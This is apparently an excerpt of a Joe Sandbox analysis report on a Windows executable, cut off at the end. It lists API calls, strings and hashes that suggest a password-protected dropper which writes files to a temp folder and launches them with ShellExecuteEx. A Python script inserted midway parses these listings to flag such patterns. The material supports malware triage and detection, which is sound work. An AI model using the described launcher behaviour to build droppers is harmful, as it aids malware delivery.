                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                          • Part of subcall function 00407470: HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                          • Part of subcall function 00407470: RtlAllocateHeap.NTDLL(00A30000,00000001,00004104), ref: 004074AA
                                          • Part of subcall function 00406807: HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                          • Part of subcall function 00404AB3: LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                          • Part of subcall function 00404AB3: LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                          • Part of subcall function 004040E0: RtlInitializeCriticalSection.NTDLL(0040B40C), ref: 004040EA
                                          • Part of subcall function 004040E0: GetStockObject.GDI32(00000011), ref: 004040F2
                                          • Part of subcall function 004040E0: memset.MSVCRT ref: 0040412E
                                          • Part of subcall function 00403D90: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                          • Part of subcall function 0040393B: RtlInitializeCriticalSection.NTDLL(0040B3B8), ref: 00403950
                                          • Part of subcall function 00403694: 6F551CD0.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                          • Part of subcall function 00403694: CoInitialize.OLE32(00000000), ref: 0040369B
                                          • Part of subcall function 00403EF0: RtlAllocateHeap.NTDLL(00000000,0000002C), ref: 00403EFD
                                          • Part of subcall function 00403060: HeapFree.KERNEL32(00000000,00A412C8,00000000,004010A6,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 00403091
                                          • Part of subcall function 004030A0: RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                          • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(02460000,00000008,00000000), ref: 00403DD1
                                        • GetUserDefaultLangID.KERNEL32(00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010CF
                                        • VerLanguageNameA.KERNEL32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010D5
                                        • CharLowerA.USER32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010E0
                                          • Part of subcall function 00403E30: HeapFree.KERNEL32(02460000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 00401311
                                          • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                          • Part of subcall function 00403A18: strncpy.MSVCRT ref: 00403A53
                                          • Part of subcall function 004036A2: MessageBoxA.USER32(00000000,00000010,00000000,?), ref: 004036BC
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                        • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Heap$AllocateCreate$Initialize$CriticalExitFreeHandleLoadModuleProcessSectionmemset$CharCursorDefaultDestroyF551IconLangLanguageLowerMessageNameObjectStockUserstrlenstrncpy
                                        • String ID: already exists in the current directory. Overwrite?$2$An unknown error occured. The program will be terminated.$Bitte geben Sie das Passwort ein.$Bitte whlen Sie einen Ordner zum Speichern der Dateien aus.$Can not allocate the memory.$Can not create some of your include files.$Choose a location to save the files.$Continue?$Die Datei $Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.$Einige Include Dateien konnten nicht erstellt werden.$Error!$Falsches Passwort.$Fehler!$Fortfahren?$Overwrite?$Password$Passwort$Please enter the password.$The file $This program is not supported on this operating system.$Wrong password.$\BDFINOPS$deutsch$lB$lB$lB
                                        • API String ID: 286559185-4283426436
                                        • Opcode ID: b87e312f4a3ab50c574789bf58b01b54171b153885240daef0a9f98a2e0d008c
                                        • Instruction ID: 2bde32f427d2b7eddb3ed1bd728a16dca1821eacaa3ecb70a8e4e83947eaff11
                                        • Opcode Fuzzy Hash: b87e312f4a3ab50c574789bf58b01b54171b153885240daef0a9f98a2e0d008c
                                        • Instruction Fuzzy Hash: 01423E71250204ABD700BF61EE62E2A3B65FB48349F50403BFA407E2F6DB7959119B9E

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(00A30000,00000001,00A30700,000040FF), ref: 00407797
                                        • GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                        • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                        • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                        • String ID: GetLongPathNameA$Kernel32.DLL
                                        • API String ID: 752937943-822094646
                                        • Opcode ID: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                        • Instruction ID: 3562a466a888384f8ba7b5ae80b98f608e44e67bd8cf52f83c325266dc9a6611
                                        • Opcode Fuzzy Hash: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                        • Instruction Fuzzy Hash: 5CF0B4722012142BC32127755D4CF6F3A6CCB82751B04003AF944B2142CE7D5D1082BE

                                        Control-flow Graph (rendered graph not captured): blocks 402761-402839; 402775-4027de calls 403100 three times and ShellExecuteEx; loop 4027e2-40280f over Sleep and GetExitCodeProcess; 40280d-402839 calls 407550 three times
                                        APIs
                                        • ShellExecuteEx.SHELL32(?), ref: 004027D9
                                        • Sleep.KERNEL32(00000019), ref: 004027E7
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004027F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CodeExecuteExitProcessShellSleep
                                        • String ID: open
                                        • API String ID: 3887608683-2758837156
                                        • Opcode ID: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                        • Instruction ID: 26639f79705cc0b5153d4f828301450fc79178279bf791e28a5e3737258c8c49
                                        • Opcode Fuzzy Hash: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                        • Instruction Fuzzy Hash: 41216A71008209AFC700EF15C845A9FBBE8FB84304F00883EF598662D0D779EA15CB56

                                        Control-flow Graph (rendered graph not captured): blocks 406330-40642a; SetFilePointer at 406345-406362, memcpy at 406389-4063a0, call 405f90 at 4063de-4063e9, WriteFile at 4063eb-406408, memcpy at 40640b-40642a
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,00406298,00000000,?,?,?,00A405B8,00000000), ref: 00406352
                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,00406298,00000000,?,?,?,00A405B8,00000000,?,?,00401A7B), ref: 00406390
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FilePointermemcpy
                                        • String ID:
                                        • API String ID: 1104741977-0
                                        • Opcode ID: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                        • Instruction ID: f3a8af50231a035adb1325dfd7a6e35cec90defb10c0b62dd41d6b31aad5b5db
                                        • Opcode Fuzzy Hash: 871ba12d0a710b8b10be5d67f70c539bcef7555e48d6414b570282c5163502cc
                                        • Instruction Fuzzy Hash: 09316C763006009FC224DF2AD448E5BF7E9EFD4321F14C82EE69697B90C634E854CBA6

                                        Control-flow Graph (rendered graph not captured): blocks 4015c5-401bb4; _rmdir at 4015c5-4015d8, 4016cf-4016f8, 401939-401993, 4019c6-401a20, 401a87-401ac0 and 401adf-401b92; common exit block 401ba4-401bb4 with ExitProcess, HeapDestroy, ExitProcess; subcalls include 402761, 405e90, 405ea0, 405fd0, 406170 and 406250
                                        APIs
                                        • _rmdir.MSVCRT ref: 004015CB
                                        • _rmdir.MSVCRT ref: 004016EB
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                        • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExitProcess_rmdir$DestroyHeap
                                        • String ID:
                                        • API String ID: 2349447675-0
                                        • Opcode ID: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                        • Instruction ID: f6203454605ce15a78fc4500694886718a1945bc82ad3b924abf98fa16e55a6a
                                        • Opcode Fuzzy Hash: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                        • Instruction Fuzzy Hash: B0E01A71114110D5D9407BB3AD83A5E392C9F4831DF50847FF242781F39A7E5655257F

                                        Control-flow Graph (rendered graph not captured): single block 401b95-401bb4 with FreeLibrary, ExitProcess, HeapDestroy, ExitProcess
                                        APIs
                                        • FreeLibrary.KERNEL32 ref: 00401B9A
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                        • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                        • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExitProcess$DestroyFreeHeapLibrary
                                        • String ID:
                                        • API String ID: 2053948195-0
                                        • Opcode ID: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                        • Instruction ID: 8df1d9b4a75efc814e8b2774fb98a4c810adc8e8576d79e7d4d7b84f580b8b4c
                                        • Opcode Fuzzy Hash: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                        • Instruction Fuzzy Hash: 85D092701A051184D9407BF35803A4D2C1C4F8870EB4180BFB651381E38E3C4314157F

                                        Control-flow Graph (rendered graph not captured): blocks 406170-40622a; call 40662c and CreateFileA at 406170-4061ab, second CreateFileA at 4061ad-4061c4, RtlAllocateHeap at 4061ca-4061fd, call 4066bb at 406218-40621f
                                        APIs
                                        • CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000,00A405B8,00000000,?,?,?,00000000,00401A67,00000001,00000000), ref: 004061A4
                                        • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401A67,00000001,00000000,00000000,0040A0C8), ref: 004061BD
                                        • RtlAllocateHeap.NTDLL(00A40000,00000000,00001000), ref: 004061DA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateFile$AllocateHeap
                                        • String ID:
                                        • API String ID: 2813278966-0
                                        • Opcode ID: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                        • Instruction ID: cfaef28ad908b1f0d4b3848689bff36785735015fc1d85a617d71e6b06036d25
                                        • Opcode Fuzzy Hash: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                        • Instruction Fuzzy Hash: C911B67234030066D230AB69AD49F57B798D790B71F11872AF3A1BB2D1C7B6A8548768
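The three function entries above (resolution of GetLongPathNameA through LoadLibraryA and GetProcAddress at 00405EB2, the ShellExecuteEx launch followed by a Sleep/GetExitCodeProcess polling loop at 00402761, and the two CreateFileA calls at 00406170) are easier to triage across many reports with a small parser for this API-listing format. The following is an added example and not part of the Joe Sandbox report or its tooling. The sample lines are copied from the entries above; the "[address]" headers in the sample are an assumption of this example, used to group calls by function, because the listing itself does not name the enclosing function:

```python
"""Parse Joe Sandbox per-function API listings and flag behaviours seen in this report."""
import json
import re
from collections import namedtuple

# Constructed sample input: API-reference lines copied from the report entries above.
# The "[address]" headers are an assumption of this example; the report groups
# calls under "APIs" without naming the enclosing function.
SAMPLE = """
[00405EB2]
• LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000), ref: 00405ED6
• GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
• GetLongPathNameA.KERNELBASE(00000000,00000000,00000104), ref: 00405EF5
• FreeLibrary.KERNEL32(00000000,?,?,?,00000000), ref: 00405EFA
[00402761]
• ShellExecuteEx.SHELL32(?), ref: 004027D9
• Sleep.KERNEL32(00000019), ref: 004027E7
• GetExitCodeProcess.KERNEL32(?,?), ref: 004027F8
[00406170]
• CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 004061A4
• CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000), ref: 004061BD
"""

# Win32 CreateFile constants: dwDesiredAccess bits and dwCreationDisposition values.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

_FUNC = re.compile(r"^\[([0-9A-Fa-f]{8})\]$")
# "• Api.MODULE(arg,arg,...), ref: 00401234"  (the argument list is optional)
_CALL = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})$")

ApiCall = namedtuple("ApiCall", "api module args ref")


def _hex(arg):
    """Parse a hex argument; '?' and string arguments yield None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_report(text):
    """Return {function_address: [ApiCall, ...]} ordered by call-site address."""
    funcs, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _FUNC.match(line)
        if m:
            current = m.group(1).upper()
            funcs[current] = []
            continue
        m = _CALL.match(line)
        if m and current is not None:
            api, module, args, ref = m.groups()
            funcs[current].append(ApiCall(api, module, args.split(",") if args else [], int(ref, 16)))
    for calls in funcs.values():
        calls.sort(key=lambda c: c.ref)
    return funcs


def find_dynamic_resolution(calls):
    """Names passed to GetProcAddress after a LoadLibraryA in the same function."""
    loaded, names = False, []
    for c in calls:
        if c.api == "LoadLibraryA":
            loaded = True
        elif c.api == "GetProcAddress" and loaded and len(c.args) > 1:
            names.append(c.args[1])
    return names


def has_exec_wait_loop(calls):
    """ShellExecuteEx followed by Sleep and GetExitCodeProcess: launch, then poll until exit."""
    apis = [c.api for c in calls]
    if "ShellExecuteEx" not in apis:
        return False
    after = apis[apis.index("ShellExecuteEx") + 1:]
    return "Sleep" in after and "GetExitCodeProcess" in after


def decode_createfile(call):
    """Name the dwDesiredAccess and dwCreationDisposition arguments of a CreateFileA call."""
    access = _hex(call.args[1]) if len(call.args) > 1 else None
    disp = _hex(call.args[4]) if len(call.args) > 4 else None
    names = [n for bit, n in sorted(ACCESS.items(), reverse=True)
             if access is not None and access & bit]
    return {"ref": f"{call.ref:08X}", "access": names, "disposition": DISPOSITION.get(disp, "?")}


def triage(text):
    """Run the three checks over a report excerpt and collect the findings."""
    found = {"dynamic_resolution": {}, "exec_and_wait": [], "createfile": []}
    for addr, calls in parse_report(text).items():
        names = find_dynamic_resolution(calls)
        if names:
            found["dynamic_resolution"][addr] = names
        if has_exec_wait_loop(calls):
            found["exec_and_wait"].append(addr)
        found["createfile"] += [decode_createfile(c) for c in calls if c.api == "CreateFileA"]
    return found


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run stand-alone, the block prints the findings as JSON. The decoder names the first CreateFileA (access 0xC0000000, disposition 2) as GENERIC_READ|GENERIC_WRITE with CREATE_ALWAYS and the second (0x40000000, 5) as GENERIC_WRITE with TRUNCATE_EXISTING, which is a create-then-reopen-and-truncate pair; the polling check matches only when Sleep and GetExitCodeProcess occur after ShellExecuteEx within the same function, which is how the loop at 4027e2-40280f appears in this listing.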

                                        Control-flow Graph (rendered graph not captured): blocks 405f13-405f89; strncpy and strlen at 405f22-405f50, loop 405f52-405f70, CreateDirectoryA at 405f72-405f84
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateDirectorystrlenstrncpy
                                        • String ID:
                                        • API String ID: 2535372781-0
                                        • Opcode ID: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                        • Instruction ID: e2a7ac9b00687a60ad497853f81a50efedb75a5df88c79b9acbfe651115fb43f
                                        • Opcode Fuzzy Hash: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                        • Instruction Fuzzy Hash: 0401F9319086099EDB21DA24CC89BEB77B99B10344F5400B6E5C4E61D1DBBC9AC8CF1A

                                        Control-flow Graph (rendered graph not captured): single block 4066f1-406737 with two RtlAllocateHeap calls
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                        • Instruction ID: 97085aaf5d90ff1175411855662eb62e74a246e0554bdcf5be02ff30625659a3
                                        • Opcode Fuzzy Hash: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                        • Instruction Fuzzy Hash: 6CF0F871244701DFD324CF1ADD01B1AFBE8FB94710F01C82EE0A9976A0D7B0A8058F94

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                          • Part of subcall function 00406434: RtlAllocateHeap.NTDLL(00000008,?), ref: 00406441
                                        • LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap$Load$CursorIcon
                                        • String ID:
                                        • API String ID: 1647777986-0
                                        • Opcode ID: ead3a737e6ccaa73f164d46f45ae259ba4949eb801cbd4beae9f9b9d72db2312
                                        • Instruction ID: e4af23a66d80ce1c901330b9548954eb4d527ddcbf43722768b30e59ae099efb
                                        • Opcode Fuzzy Hash: ead3a737e6ccaa73f164d46f45ae259ba4949eb801cbd4beae9f9b9d72db2312
                                        • Instruction Fuzzy Hash: 55F0EDB0B81305BAEB106B719E47F5636A0E704F05FA0843BB6017A6E2DBF95110AF9D

                                        Control-flow Graph (rendered graph not captured): single block 407470-4074b6 with HeapCreate and RtlAllocateHeap
                                        APIs
                                        • HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                        • RtlAllocateHeap.NTDLL(00A30000,00000001,00004104), ref: 004074AA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Heap$AllocateCreate
                                        • String ID:
                                        • API String ID: 2875408731-0
                                        • Opcode ID: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                        • Instruction ID: edee8b013b50a9eb835c02f3e92a01e020b9c77627f8564c048df27c577a0994
                                        • Opcode Fuzzy Hash: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                        • Instruction Fuzzy Hash: 25E0B670144304AFE314CF50EF05F563BA8F304744F100429FA48AA3AAC7F264508B9E

                                        Control-flow Graph (rendered graph not captured): single block 403694-4036a1 with a call to 6F551CD0 (COMCTL32) and CoInitialize
                                        APIs
                                        • 6F551CD0.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                        • CoInitialize.OLE32(00000000), ref: 0040369B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: F551Initialize
                                        • String ID:
                                        • API String ID: 1663224656-0
                                        • Opcode ID: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                        • Instruction ID: e54652b8d3c1eea1b95337253ed1730e4f0a5e5d42e685e6d2013b240332fa4d
